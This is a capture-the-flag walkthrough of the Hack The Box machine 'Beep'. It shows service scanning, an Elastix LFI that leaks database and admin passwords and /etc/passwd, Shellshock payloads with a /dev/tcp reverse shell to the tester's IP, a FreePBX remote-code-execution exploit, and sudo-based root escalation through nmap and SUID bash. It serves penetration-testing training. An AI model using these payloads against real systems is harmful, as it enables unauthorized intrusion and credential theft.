Beep
Beep HTB walkthrough 2023 tested on Kali. Beep has a very large list of running services, which can make it a bit challenging to find the correct entry method.
Scanning
Scanning reveals a no of ports to be opened
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sS -sC -sV -O -T4 10.10.10.7 -oX beep.nmap
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-19 08:28 EDT
Nmap scan report for 10.10.10.7
Host is up (0.17s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 adee5abb6937fb27afb83072a0f96f53 (DSA)
|_ 2048 bcc6735913a18a4b550750f6651d6d0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE APOP UIDL PIPELINING TOP IMPLEMENTATION(Cyrus POP3 server v2) RESP-CODES LOGIN-DELAY(0) USER EXPIRE(NEVER) STLS
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 875/udp status
|_ 100024 1 878/tcp status
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: Completed UIDPLUS STARTTLS X-NETSCAPE LITERAL+ BINARY ACL CHILDREN URLAUTHA0001 LISTEXT OK IMAP4 ANNOTATEMORE THREAD=REFERENCES NO RIGHTS=kxte MAILBOX-REFERRALS CONDSTORE CATENATE LIST-SUBSCRIBED ID THREAD=ORDEREDSUBJECT IMAP4rev1 IDLE QUOTA SORT MULTIAPPEND ATOMIC SORT=MODSEQ NAMESPACE UNSELECT RENAME
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
|_http-server-header: Apache/2.2.3 (CentOS)
|_ssl-date: 2023-07-19T12:32:31+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4445/tcp open upnotifyp?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=7/19%OT=22%CT=1%CU=35489%PV=Y%DS=2%DC=I%G=Y%TM=64B7D8A
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=C9%GCD=1%ISR=CE%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11N
OS:W7%O6=M53CST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R
OS:=Y%DF=Y%T=40%W=16D0%O=M53CNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M53CST11NW7%RD=0%
OS:Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 443.44 seconds
Web Enumeration
Both port 80 and 443 are aval and apache is running on both ports. We, also got the domain name. so add it to /etc/hosts
Visiting the site on HTTP, we are redirected to https but the TLS version of the site is low and Firefox gives us an error
Now open the config settings and in new tab, enter the following
about:config
Search for security.tls.version.min and change it to 1.
Now browse again and we get the main Elastix page. Visiting robots.txt, sitemap and source code does not reveal anything. Lets try dirbusting.
ffuf didn't work for some reason. Gobuster saved the day and found a few directories
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -u https://beep.localdomain/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -k -t 50
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://beep.localdomain/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/07/19 09:25:32 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 322] [--> https://beep.localdomain/images/]
/help (Status: 301) [Size: 320] [--> https://beep.localdomain/help/]
/themes (Status: 301) [Size: 322] [--> https://beep.localdomain/themes/]
/modules (Status: 301) [Size: 323] [--> https://beep.localdomain/modules/]
/mail (Status: 301) [Size: 320] [--> https://beep.localdomain/mail/]
/admin (Status: 301) [Size: 321] [--> https://beep.localdomain/admin/]
/static (Status: 301) [Size: 322] [--> https://beep.localdomain/static/]
/lang (Status: 301) [Size: 320] [--> https://beep.localdomain/lang/]Now try login to the admin
We get an error page indicating the version of free PBX 2.8.1.4.
Web exploitation with LFI
Now lets search for vulnerability.
┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit Elastix
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | php/webapps/18650.py
------------------------------------------------------------------------------------------------------------------------------------- --------------------------------So, we will target first LFI
┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit -m php/webapps/37637.pl
Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
URL: https://www.exploit-db.com/exploits/37637
Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl
Codes: N/A
Verified: True
File Type: ASCII text
Copied to: /home/kali/Desktop/37637.plOpening it, we get the LFI address
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
Now paste it in browser and see if we get the config file. And we get the file
Now press ctrl+u to see the source code. And we get a number of passwords.
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
Lets try enumerating users with reading etc/passwd file
We got a number of users. (Only users with bin/bash are important.
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.Getting Access with SSH
As ssh was open let's try ssh with found users and passwords. We will get the error due to old version of ssh. Add the following to /etc/ssh/ssh_config
HostKeyAlgorithms = +ssh-rsa
PubkeyAcceptedAlgorithms = +ssh-rsaNow use the following command to ssh
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected] use the password " jEhdIekWmdjE" and we are in. We are already root.
We got the flags.
Method 2
Webmin is running on port 10000 which allows full access of the machine. Trying the username root with the passwords I collected from the LFI, I can login to webmin with root / jEhdIekWmdjE. This interface is designed to administer the machine and has full root access.
We can also change passwords
We can also schedule any command. Lets schedule a reverse shell command as local user
And we get the reverse shell
We could have got shell as root user as well if we want.
Method 3 - Exploiting Shell Shock
From Webmin login panel, initiate a login request and intercept it in burp. Forward it to the repeater.
Now change the user agent to shell shock and try following payloads.
() { :; };/bin/echo heloo
() { :; }; sleep 10 (did work some kind of blind shell shock)Now check ping
() { :; };ping -c 1 10.10.14.108
on our machine
sudo tcpdump -i tun0 -vAnd we get the ping. So lets try reverse shell.
sh -i >& /dev/tcp/10.10.14.108/9001 0>&1And we got the shell.
Method 4 RCE Elastix
Searching with searchsploit had revealed a RCE vulnerability.
┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit elastix
--------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | php/webapps/18650.pyDownload last script
searchsploit -m php/webapps/18650.pyWe need to know a valid SIP extension, so use the following tool to scan for valid extensions.
┌──(kali㉿kali)-[~/Desktop]
└─$ svwar -m INVITE -e100-999 10.10.10.7
WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233 | reqauth |
+-----------+----------------+So, we have a valid extension, make necessry changes in the script and open the listener on port 443.
Now, run the script and we get the shell.
Priv Escalation
Now run sudo -l to view commands that can be run as sudo
bash-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
bash-3.2$
Use GTFO bins as a ref
Nmap priv esc
sudo nmap --interactive
nmap> !sh
chmod on root directory
Run the following command to give everyone rwx permissions on the /root directory.
sudo chmod o+rwx /rootchmod /bin/bash add suid permissions
chmod jumps out right away. I’ll pick a file, like /bin/bash, and set it to SUID:
bash-3.2$ ls -l /bin/bash
-rwxr-xr-x 1 root root 729292 Jan 22 2009 /bin/bash
bash-3.2$ sudo chmod 4755 /bin/bash
bash-3.2$ ls -l /bin/bash
-rwsr-xr-x 1 root root 729292 Jan 22 2009 /bin/bashNow just run it (with -p to not drop privs) and get a root shell:
bash-3.2$ bash -p
bash-3.2# id
uid=100(asterisk) gid=101(asterisk) euid=0(root)Last updated